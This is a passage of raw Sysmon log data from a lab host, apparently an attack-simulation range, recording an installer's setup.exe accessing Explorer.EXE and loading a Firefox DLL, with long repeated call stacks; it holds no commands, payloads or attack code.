\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014249Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014248Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\api-ms-win-core-timezone-l1-1-0.dll2021-01-18 13:59:52.130 10341000x800000000000000014247Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014246Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014245Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014244Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014243Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014242Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014241Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014240Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014239Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014238Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014237Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014236Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014235Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014234Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014233Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014232Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.130{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014231Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 